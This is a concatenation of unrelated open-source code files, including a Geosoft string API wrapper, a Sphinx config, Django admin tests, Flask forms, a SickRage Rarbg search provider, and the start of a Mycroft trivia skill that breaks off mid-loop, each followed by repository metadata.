:type istr: str_ref
:type old: str
:type new_char: str
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the input replacement character is "", then the
string will be truncated at the first character to replace.
"""
istr.value = gxapi_cy.WrapSTR._replace_char(GXContext._get_tls_geo(), istr.value.encode(), old.encode(), new_char.encode())
@classmethod
def replace_char2(cls, istr, old, new_char):
"""
Replaces characters in a string, supports simple removal.
:param istr: String to modify
:param old: Character to replace (first character only)
:param new_char: Replacement character (first character only)
:type istr: str_ref
:type old: str
:type new_char: str
.. versionadded:: 6.3
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the replacement character is "" (NULL character)
then the character to replace is removed from the
input string, and the string is shortened.
"""
istr.value = gxapi_cy.WrapSTR._replace_char2(GXContext._get_tls_geo(), istr.value.encode(), old.encode(), new_char.encode())
@classmethod
def replace_multi_char(cls, istr, old, new_char):
"""
Replaces multiple characters in a string.
:param istr: String to modify
:param old: Characters to replace
:param new_char: Replacement characters
:type istr: str_ref
:type old: str
:type new_char: str
.. versionadded:: 5.1.5
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The number of characters to replace must equal
the number of replacement characters.
"""
istr.value = gxapi_cy.WrapSTR._replace_multi_char(GXContext._get_tls_geo(), istr.value.encode(), old.encode(), new_char.encode())
@classmethod
def replace_non_ascii(cls, str_val, rpl):
"""
Replace non-ASCII characters in a string.
:param str_val: String to modify
:param rpl: Replacement character
:type str_val: str_ref
:type rpl: str
.. versionadded:: 6.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
        **Note:** All characters > 127 will be replaced by the first character
of the replacement string.
"""
str_val.value = gxapi_cy.WrapSTR._replace_non_ascii(GXContext._get_tls_geo(), str_val.value.encode(), rpl.encode())
@classmethod
def set_char(cls, str_val, ascii):
"""
Set a string's first character using an ASCII value of a character.
:param str_val: String
:param ascii: ASCII value
:type str_val: str_ref
:type ascii: int
.. versionadded:: 5.1.4
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
str_val.value = gxapi_cy.WrapSTR._set_char(GXContext._get_tls_geo(), str_val.value.encode(), ascii)
@classmethod
def trim_quotes(cls, str_val):
"""
Remove double quotes.
:param str_val: String to trim
:type str_val: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** THE STRING IS MODIFIED.
This method goes through the string and removes all spaces in a
string except those enclosed in quotes. It then removes
        any quotes. It is useful for trimming unwanted spaces from
an input string but allows the user to use quotes as well.
If a quote follows a backslash, the quote is retained and
the backslash is deleted. These quotes are NOT treated as
delimiters.
"""
str_val.value = gxapi_cy.WrapSTR._trim_quotes(GXContext._get_tls_geo(), str_val.value.encode())
@classmethod
def trim_space(cls, str_val, trim):
"""
Remove leading and/or trailing whitespace.
:param str_val: String to trim
:param trim: :ref:`STR_TRIM`
:type str_val: str_ref
:type trim: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** THE STRING IS MODIFIED.
Whitespace characters are defined as space, tab, carriage return,
new line, vertical tab or formfeed (0x09 to 0x0D, 0x20)
"""
str_val.value = gxapi_cy.WrapSTR._trim_space(GXContext._get_tls_geo(), str_val.value.encode(), trim)
@classmethod
def un_quote(cls, str_val):
"""
Remove double quotes from string
:param str_val: String to unquote
:type str_val: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** THE STRING IS MODIFIED.
The pointers will be advanced past a first character
        quote and a last character quote will be set to '\\0'.
        Both first and last characters must be quotes for the
        trimming to take place.
"""
str_val.value = gxapi_cy.WrapSTR._un_quote(GXContext._get_tls_geo(), str_val.value.encode())
# Misc
@classmethod
def gen_group_name(cls, istr1, istr2, istr3, ostr):
"""
Generate a group name string
from type string, database and channel(optional) strings..
:param istr1: Input type string (static part)
:param istr2: Input db string
:param istr3: Input ch string (could be 0 length)
:param ostr: Output group name string
:type istr1: str
:type istr2: str
:type istr3: str
:type ostr: str_ref
.. versionadded:: 5.1.4
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
        **Note:** The output group name string is formed as typestr_dbstr_chstr.
        If the database/channel strings are too long to fit the output string
(max total length of 1040, including the NULL ending), then
the typestr will always be kept the full length to be the first part,
while the dbstr and/or chstr will be shortened to be the
second and/or third part of the output string.
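
        A hedged sketch (illustrative names; the output follows the
        typestr_dbstr_chstr pattern described above):

        >>> name = str_ref()
        >>> GXSTR.gen_group_name("SYMB", "survey", "mag", name)
        >>> name.value  # expected: 'SYMB_survey_mag'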
.. seealso::
GenNewGroupName_MVIEW
"""
ostr.value = gxapi_cy.WrapSTR._gen_group_name(GXContext._get_tls_geo(), istr1.encode(), istr2.encode(), istr3.encode(), ostr.value.encode())
# Tokenizing
@classmethod
def count_tokens(cls, str_val, delims):
"""
Counts number of tokens.
:param str_val: String to tokenize
:param delims: Delimiter characters
:type str_val: str
:type delims: str
:returns: Number of tokens in the string.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Delimiters are "soft" in that one or more delimiters
is considered a single delimiter, and preceding and
trailing delimiters are ignored.
DO NOT use this function except in GXC code. The corresponding
`get_token <geosoft.gxapi.GXSTR.get_token>` function will not operate correctly in GX.Net code.
"""
ret_val = gxapi_cy.WrapSTR._count_tokens(GXContext._get_tls_geo(), str_val.encode(), delims.encode())
return ret_val
@classmethod
def get_token(cls, dest, orig, tok):
"""
Get a token from a tokenized string.
:param dest: Destination string
:param orig: Tokenized string
:param tok: Token number wanted (0 is the first!)
:type dest: str_ref
:type orig: str
:type tok: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Call `tokens <geosoft.gxapi.GXSTR.tokens>` to prepare the tokenized
string.
You MUST NOT get tokens beyond number of tokens returned
by `tokens <geosoft.gxapi.GXSTR.tokens>` or `tokens2 <geosoft.gxapi.GXSTR.tokens2>`.
The first token has index 0.
DO NOT use this function except in GXC code.
`get_token <geosoft.gxapi.GXSTR.get_token>` function will not operate correctly in GX.Net code.
.. seealso::
`tokens <geosoft.gxapi.GXSTR.tokens>`, GetToken_STR
"""
dest.value = gxapi_cy.WrapSTR._get_token(GXContext._get_tls_geo(), dest.value.encode(), orig.encode(), tok)
@classmethod
def tokenize(cls, str_val, soft, hard, esc, quote):
"""
Tokenize a string based on any characters.
:param str_val: `GXSTR <geosoft.gxapi.GXSTR>` - String containing token(s)
:param soft: szSoft - Soft delimiters (spaces/tabs)
:param hard: szHard - Hard delimiters (commas)
:param esc: szEsc - Escape delimiters (back-slash)
:param quote: szQuote- Quote delimiters (quote characters)
:type str_val: str_ref
:type soft: str
:type hard: str
:type esc: str
:type quote: str
:returns: Number of tokens
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** This uses a finite state machine to tokenize on these
rules:
1. Any one character following an escape delimiter is
treated as a normal character.
2. Any characters inside a quote string are treated as
normal characters.
3. Any number of Soft delimiters in sequence without a
        hard delimiter are treated as one hard delimiter.
        4. Any number of soft delimiters can precede or follow
a hard delimiter and are ignored.
EXAMPLE
Soft = [ ] Hard = [,] Escape = [\\] Quote = ["]
[this is a , , the "test," of , \\,\\" my delimite fi,]
Results in:
[this] [is] [a] [] [the] ["test,"] [of] [\\,\\"] [my] [delimite] [fi] []
        DO NOT use this function except in GXC code. The corresponding
        GetToken_STR function will not operate correctly in GX.Net code.
.. seealso::
GetToken_STR
"""
ret_val, str_val.value = gxapi_cy.WrapSTR._tokenize(GXContext._get_tls_geo(), str_val.value.encode(), soft.encode(), hard.encode(), esc.encode(), quote.encode())
return ret_val
@classmethod
def tokens(cls, str_val, delims):
"""
Tokenize a string
:param str_val: String to tokenize
:param delims: Delimiter characters
:type str_val: str_ref
:type delims: str
:returns: Number of tokens, maximum is 2048
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Delimiters in the string are reduced to a single NULL.
        Delimiters within double quoted strings are ignored.
Use GetToken_STR to extract tokens.
DO NOT use this function except in GXC code. The corresponding
`get_token <geosoft.gxapi.GXSTR.get_token>` function will not operate correctly in GX.Net code.
.. seealso::
`tokens2 <geosoft.gxapi.GXSTR.tokens2>`, GetToken_STR
"""
ret_val, str_val.value = gxapi_cy.WrapSTR._tokens(GXContext._get_tls_geo(), str_val.value.encode(), delims.encode())
return ret_val
@classmethod
def tokens2(cls, str_val, soft, hard, esc, quote):
"""
General tokenize a string
:param str_val: String to tokenize
:param soft: szSoft - Soft delimiters (spaces/tabs)
:param hard: szHard - Hard delimiters (commas)
:param esc: szEsc - Escape delimiters (back-slash)
:param quote: szQuote- Quote delimiters (quote characters)
:type str_val: str_ref
:type soft: str
:type hard: str
:type esc: str
:type quote: str
:returns: Number of Tokens
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** This function is for old GX compatibility only.
See `tokenize <geosoft.gxapi.GXSTR.tokenize>`.
DO NOT use this function except in GXC code. The corresponding
`get_token <geosoft.gxapi.GXSTR.get_token>` function will not operate correctly in GX.Net code.
"""
ret_val, str_val.value = gxapi_cy.WrapSTR._tokens2(GXContext._get_tls_geo(), str_val.value.encode(), soft.encode(), hard.encode(), esc.encode(), quote.encode())
return ret_val
@classmethod
def parse_list(cls, str_val, gvv):
"""
Parse a tokenized list to get a selection list.
:param str_val: String to be parsed
:param gvv: Selection Buffer to fill
:type str_val: str
:type gvv: GXVV
.. versionadded:: 5.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Given a list such as "1,3,4,6-9,12", it fills the
input buffer with 1 if the number is selected,
0 if not. The items are delimited with spaces
or commas, and ranges are acceptable, either using
a "-" or ":", e.g. 3-6 and 3:6 both mean 3,4,5, and 6.
Only values from 0 to one less than the buffer length
are used. Out-of-range values are ignored.
"""
gxapi_cy.WrapSTR._parse_list(GXContext._get_tls_geo(), str_val.encode(), gvv)
### endblock ClassImplementation
### block ClassExtend
# NOTICE: The code generator will not replace the code in this block
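# Illustrative sketch (not part of the generated API): a pure-Python
# approximation of the selection-list parsing that parse_list() above
# delegates to the native gxapi_cy.WrapSTR._parse_list call. The helper
# name and exact behavior here are assumptions for documentation only;
# negative indices are not expected per the parse_list() docstring.
def _parse_selection_sketch(spec, buffer_len):
    """Turn a list such as "1,3,4,6-9,12" into a 0/1 selection list."""
    selected = [0] * buffer_len
    for token in spec.replace(' ', ',').split(','):
        if not token:
            continue
        # ranges may use "-" or ":", e.g. 3-6 and 3:6 both mean 3,4,5,6
        sep = '-' if '-' in token else (':' if ':' in token else None)
        if sep:
            lo, hi = token.split(sep, 1)
            lo, hi = int(lo), int(hi)
        else:
            lo = hi = int(token)
        for i in range(lo, hi + 1):
            if 0 <= i < buffer_len:  # out-of-range values are ignored
                selected[i] = 1
    return selected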
### endblock ClassExtend
### block Footer
# NOTICE: The code generator will not replace the code in this block
### endblock Footer | bsd-2-clause | -3,684,899,027,531,421,700 | 31.354388 | 188 | 0.58097 | false |
aptakhin/docs | conf.py | 1 | 11385 | # -*- coding: utf-8 -*-
#
# conan documentation build configuration file, created by
# sphinx-quickstart on Thu May 21 10:27:36 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo',
'sphinx.ext.pngmath',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'conan'
copyright = u'2015, conan'
author = u'conan'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.4'
# The full version, including alpha/beta/rc tags.
release = '0.4.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# based on: https://github.com/snide/sphinx_rtd_theme
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = ["_themes"]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = []
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'conandoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'conan.tex', u'conan Documentation',
u'conan', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'conan', u'conan Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'conan', u'conan Documentation',
author, 'conan', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
| mit | -5,884,956,265,093,350,000 | 30.277473 | 80 | 0.706632 | false |
pombredanne/rest-api-mock-server | mock_webapp/mock_api/tests/test_admin.py | 1 | 2713 | # -*- coding: utf-8 -*-
from django.conf import settings
from django.core.urlresolvers import reverse
from django.test import TestCase
from mock import patch, ANY
from mock_api.models import AccessLog
@patch("requests.request")
class AccessLogAdminTest(TestCase):
fixtures = ("test_api.json", "test_access_logs.json", "test_users.json")
API_ENDPOINT_URL = '/api/items/'
def setUp(self):
self.client.login(username="admin", password="pass")
def url(self, access_log_pk):
return reverse("admin:run_api_endpoint_callback", args=(access_log_pk,))
def get_first_callback(self, access_log):
return access_log.api_endpoint.callbacks.first()
def assert_message(self, message_mock, message):
message_mock.assert_called_once_with(ANY, ANY, message)
def test_run_api_endpoint_callback_for_missing_access_log_object_returns_404(self, request_mock):
response = self.client.get(self.url(9999))
self.assertEqual(response.status_code, 404)
self.assertEqual(request_mock.call_count, 0)
@patch("django.contrib.messages.add_message")
def test_run_api_endpoint_callback_with_one_callback_defined(self, message_mock, request_mock):
access_log = AccessLog.objects.get(pk=1)
callback = self.get_first_callback(access_log)
response = self.client.get(self.url(access_log.pk))
self.assertEqual(response.status_code, 302)
request_mock.assert_called_once_with(callback.method, callback.url, params=callback.get_params(),
headers=callback.get_headers(),
timeout=settings.DEFAULT_CALLBACK_REQUEST_TIMEOUT)
self.assert_message(message_mock, 'Api endpoint {} callbacks were run'.format(access_log.api_endpoint))
@patch("django.contrib.messages.add_message")
def test_run_api_endpoint_callback_without_callback_defined(self, message_mock, request_mock):
access_log = AccessLog.objects.get(pk=2)
response = self.client.get(self.url(access_log.pk))
self.assertEqual(response.status_code, 302)
self.assertEqual(request_mock.call_count, 0)
self.assert_message(message_mock, 'No callbacks for api endpoint {}'.format(access_log.api_endpoint))
@patch("django.contrib.messages.add_message")
def test_run_api_endpoint_callback_without_api_endpoint(self, message_mock, request_mock):
access_log = AccessLog.objects.get(pk=3)
response = self.client.get(self.url(access_log.pk))
self.assertEqual(response.status_code, 302)
self.assertEqual(request_mock.call_count, 0)
self.assertEqual(message_mock.call_count, 0)
| mit | -3,531,914,026,436,281,000 | 41.390625 | 111 | 0.683008 | false |
wbali/rwc-inventory-manager | inventory_manager_app/stock/forms.py | 1 | 1742 | from flask_wtf import FlaskForm
from wtforms import StringField, DateField, IntegerField, SelectField, DecimalField
from wtforms.validators import DataRequired, Optional
from wtforms.widgets import TextArea
class StockForm(FlaskForm):
stock_id = IntegerField()
item_name = StringField("Item name", validators=[
DataRequired(message="Please enter the item's name.")
])
arrival_date = DateField("Arrival date", validators=[Optional()])
price = DecimalField("Price", validators=[
DataRequired(message="Please enter the item's price.")
])
shipping_date = DateField("Shipping date", validators=[Optional()])
selling_price = DecimalField("Selling-price", validators=[Optional()])
quantity = IntegerField("Quantity", validators=[Optional()])
customer = SelectField(validators=[Optional()], coerce=int)
vendor = SelectField(validators=[Optional()], coerce=int)
billing_date = DateField("Billing date", validators=[Optional()])
notes = StringField("Notes", widget=TextArea())
barcode = StringField("Barcode", validators=[Optional()])
class VendorForm(FlaskForm):
vendor_id = IntegerField()
name = StringField("Vendor name", validators=[
DataRequired(message="Please enter the vendor's name.")
])
address = StringField("Address", validators=[
DataRequired(message="Please enter the vendor's address.")
])
class CustomerForm(FlaskForm):
customer_id = IntegerField()
name = StringField("Customer name", validators=[
DataRequired(message="Please enter the customer's name.")
])
address = StringField("Address", validators=[
DataRequired(message="Please enter the customer's address.")
]) | mit | -1,446,767,546,980,391,400 | 27.57377 | 83 | 0.695178 | false |
Arcanemagus/SickRage | sickbeard/providers/rarbg.py | 1 | 6962 | # coding=utf-8
# Author: Dustyn Gibson <[email protected]>
#
# URL: https://sick-rage.github.io
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import datetime
import time
import sickbeard
from sickbeard import logger, tvcache
from sickbeard.common import cpu_presets
from sickbeard.indexers.indexer_config import INDEXER_TVDB
from sickrage.helper.common import convert_size, try_int
from sickrage.providers.torrent.TorrentProvider import TorrentProvider
class RarbgProvider(TorrentProvider): # pylint: disable=too-many-instance-attributes
def __init__(self):
TorrentProvider.__init__(self, "Rarbg")
self.public = True
self.minseed = None
self.ranked = None
self.sorting = None
self.minleech = None
self.token = None
self.token_expires = None
# Spec: https://torrentapi.org/apidocs_v2.txt
self.url = "https://rarbg.com"
self.urls = {"api": "http://torrentapi.org/pubapi_v2.php"}
self.proper_strings = ["{{PROPER|REPACK}}"]
self.cache = tvcache.TVCache(self, min_time=10) # only poll RARBG every 10 minutes max
def login(self):
if self.token and self.token_expires and datetime.datetime.now() < self.token_expires:
return True
login_params = {
"get_token": "get_token",
"format": "json",
"app_id": "sickrage2"
}
response = self.get_url(self.urls["api"], params=login_params, returns="json")
if not response:
logger.log("Unable to connect to provider", logger.WARNING)
return False
self.token = response.get("token")
self.token_expires = datetime.datetime.now() + datetime.timedelta(minutes=14) if self.token else None
return self.token is not None
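    # Illustrative note: torrentapi tokens are assumed to lapse after
    # roughly 15 minutes, so login() caches the token for 14 minutes and
    # short-circuits while the cached value is still fresh.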
def search(self, search_strings, age=0, ep_obj=None): # pylint: disable=too-many-branches, too-many-locals, too-many-statements
results = []
if not self.login():
return results
search_params = {
"app_id": "sickrage2",
"category": "tv",
"min_seeders": try_int(self.minseed),
"min_leechers": try_int(self.minleech),
"limit": 100,
"format": "json_extended",
"ranked": try_int(self.ranked),
"token": self.token,
}
if ep_obj is not None:
ep_indexerid = ep_obj.show.indexerid
ep_indexer = ep_obj.show.indexer
else:
ep_indexerid = None
ep_indexer = None
for mode in search_strings:
items = []
logger.log("Search Mode: {0}".format(mode), logger.DEBUG)
if mode == "RSS":
search_params["sort"] = "last"
search_params["mode"] = "list"
search_params.pop("search_string", None)
search_params.pop("search_tvdb", None)
else:
search_params["sort"] = self.sorting if self.sorting else "seeders"
search_params["mode"] = "search"
if ep_indexer == INDEXER_TVDB and ep_indexerid:
search_params["search_tvdb"] = ep_indexerid
else:
search_params.pop("search_tvdb", None)
for search_string in search_strings[mode]:
if mode != "RSS":
search_params["search_string"] = search_string
logger.log("Search string: {0}".format
(search_string.decode("utf-8")), logger.DEBUG)
time.sleep(cpu_presets[sickbeard.CPU_PRESET])
data = self.get_url(self.urls["api"], params=search_params, returns="json")
if not isinstance(data, dict):
logger.log("No data returned from provider", logger.DEBUG)
continue
error = data.get("error")
error_code = data.get("error_code")
# Don't log when {"error":"No results found","error_code":20}
# List of errors: https://github.com/rarbg/torrentapi/issues/1#issuecomment-114763312
if error:
if try_int(error_code) != 20:
logger.log(error)
continue
torrent_results = data.get("torrent_results")
if not torrent_results:
logger.log("Data returned from provider does not contain any torrents", logger.DEBUG)
continue
for item in torrent_results:
try:
title = item.pop("title")
download_url = item.pop("download")
if not all([title, download_url]):
continue
seeders = item.pop("seeders")
leechers = item.pop("leechers")
if seeders < self.minseed or leechers < self.minleech:
if mode != "RSS":
logger.log("Discarding torrent because it doesn't meet the"
" minimum seeders or leechers: {0} (S:{1} L:{2})".format
(title, seeders, leechers), logger.DEBUG)
continue
torrent_size = item.pop("size", -1)
size = convert_size(torrent_size) or -1
torrent_hash = self.hash_from_magnet(download_url)
if mode != "RSS":
logger.log("Found result: {0} with {1} seeders and {2} leechers".format
(title, seeders, leechers), logger.DEBUG)
result = {'title': title, 'link': download_url, 'size': size, 'seeders': seeders, 'leechers': leechers, 'hash': torrent_hash}
items.append(result)
except StandardError:
continue
# For each search mode sort all the items by seeders
items.sort(key=lambda d: try_int(d.get('seeders', 0)), reverse=True)
results += items
return results
provider = RarbgProvider()
| gpl-3.0 | 7,859,844,668,399,947,000 | 38.333333 | 149 | 0.548118 | false |
JarbasAI/jarbas-core | mycroft/jarbas-skills/skill_trivia/__init__.py | 1 | 10505 | from adapt.intent import IntentBuilder
from mycroft.skills.core import MycroftSkill
import random, math, os, sys
from os.path import dirname
path= dirname(dirname(__file__))
sys.path.append(path)
# import intent layers
from service_intent_layer import IntentParser
__author__ = 'jarbas'
class MathQuestions:
def __init__(self):
self.questions = []
self.init_questions()
def ft(self, text, randints, randdec, randsgnint):
return text.format(randints, randdec, randsgnint)
def init_questions(self):
# TODO more questions / equation types
self.questions.append(["Convert {1[0]:0.2f} centimeters into meters.", "{1[0]}*0.01"])
self.questions.append([
"What is the length of the line segment with endpoints ({2[1]},{2[2]}) and ({2[3]},{2[4]})?",
"math.sqrt(({2[3]}-{2[1]})**2 + ({2[4]}-{2[2]})**2)"])
self.questions.append(["Solve for x in the equation {2[1]}x - {0[2]} = {2[7]}", "({2[7]}+{0[2]})*1./{2[1]}"])
def ask_question(self):
question = random.choice(self.questions)
answer = question[1]
question = question[0]
question, answer = self.answer_question(question, answer)
return question, answer
def answer_question(self, question, answer):
randints = []
randdec = []
randsgnint = []
for a in range(1,
11): # Creates three arrays of whole numbers, random decimals, and random signed integers for use in questions.
randints.append(random.randint(1, 10))
